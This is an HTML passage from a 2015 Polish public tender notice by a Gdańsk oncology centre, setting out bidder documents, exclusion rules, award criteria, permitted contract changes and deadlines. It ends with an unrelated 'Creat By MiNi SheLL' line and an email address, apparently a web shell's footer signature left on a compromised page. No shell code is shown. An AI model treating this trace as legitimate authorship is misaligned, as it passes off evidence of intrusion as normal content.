   - Dokumenty stanowiące załączniki wymagane przez SIWZ powinny zostać wypełnione przez Wykonawcę bez wyjątku i ściśle wg. warunków i postanowień zawartych w SIWZ - bez dokonywania w nich zmian.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykaz części zamówienia, których wykonanie zamierza się powierzyć Podwykonawcom - wg zał. nr 9 do SIWZ (jeżeli dotyczy).
2.	Pełnomocnictwo potwierdzające posiadanie uprawnień osoby/osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych 
3.	W przypadku spółki cywilnej - pisemne pełnomocnictwo uprawniające jednego ze wspólników do występowania w imieniu wszystkich wspólników w przeprowadzonym postępowaniu.
4.	W przypadku konsorcjum - należy podać informacje o wszystkich podmiotach wchodzących w skład konsorcjum i załączyć dokument, w który wszyscy wykonawcy wchodzący w skład konsorcjum ustanawiają pełnomocnika do reprezentacji.
Informacja dodatkowa:
UWAGA! W związku z opublikowaną w dniu 18.09.2014r zmianą ustawy z dnia 29.08.2014r o zmianie ustawy PZP(nowelizacją),Zamawiający przewiduje wykluczenie Wykonawcy na podst. art. 24 ust. 2a uPzp, tj. w sytuacji, gdy Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w SIWZ lub zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodnił, że podjął konkretne środki techniczne , organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił  szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian, w zakresie art. 144 uPzp:
a)terminu realizacji umowy w przypadku, gdy wystąpiły okoliczności, których strony nie były w stanie przewidzieć pomimo zachowania należytej staranności np. działanie siły wyższej; zmiany będą korzystne dla Zamawiającego lub będą leżały jego interesie; 
b)zmiana wynagrodzenia wyłącznie w sytuacji ustawowej zmiany wysokości podatku VAT;
c)zmiana metrażu  
d)zmiana pomieszczeń (ewentualne remonty, modyfikacje, przebudowy)
e)zmiana zakresu prac, częstotliwości wykonywania prac lub minimalnej ilości obsady pracowników;
f)wydłużenie terminu obowiązywania umowy w przypadku niewykorzystania wartości umowy brutto, o której mowa w § 3 niniejszej umowy
g)zmiana podwykonawcy ze względów losowych lub innych korzystnych dla Zamawiającego, w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawcy.
h) Zmiana danych teleadresowych stron wymaga niezwłocznego pisemnego powiadomienia drugiej
strony umowy i nie stanowi zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wco.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzkie Centrum Onkologii w Gdańsku Spółka z o.o. 80-210 Gdańsk, ul.M.Skłodowskiej-Curie2 pok. 35 Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2015 godzina 12:30, miejsce: Wojewódzkie Centrum Onkologii w Gdańsku Spółka z o.o. 80-210 Gdańsk, ul.M.Skłodowskiej-Curie2 pok. 39 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja dodatkowa:
 W związku z opublikowaną w dniu 18.09.2014r zmianą ustawy z dnia 29.08.2014r o zmianie ustawy PZP(nowelizacją),Zamawiający przewiduje wykluczenie Wykonawcy na podst. art. 24 ust. 2a uPzp, tj. w sytuacji, gdy Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w SIWZ lub zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodnił, że podjął konkretne środki techniczne , organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił  szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com